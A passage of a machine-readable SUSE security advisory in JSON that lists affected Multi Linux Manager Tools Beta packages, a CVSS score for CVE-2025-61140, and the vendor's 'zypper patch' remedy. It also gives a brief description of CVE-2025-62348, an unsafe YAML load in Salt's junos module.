"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61140",
"url": "https://www.suse.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "SUSE Bug 1257442 for CVE-2025-61140",
"url": "https://bugzilla.suse.com/1257442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "important"
}
],
"title": "CVE-2025-61140"
},
{
"cve": "CVE-2025-62348",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62348"
}
],
"notes": [
{
"category": "general",
"text": "Salt\u0027s junos execution module contained an unsafe YAML decode/load usage. A specially crafted YAML payload processed by the junos module could lead to unintended code execution under the context of the Salt process.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
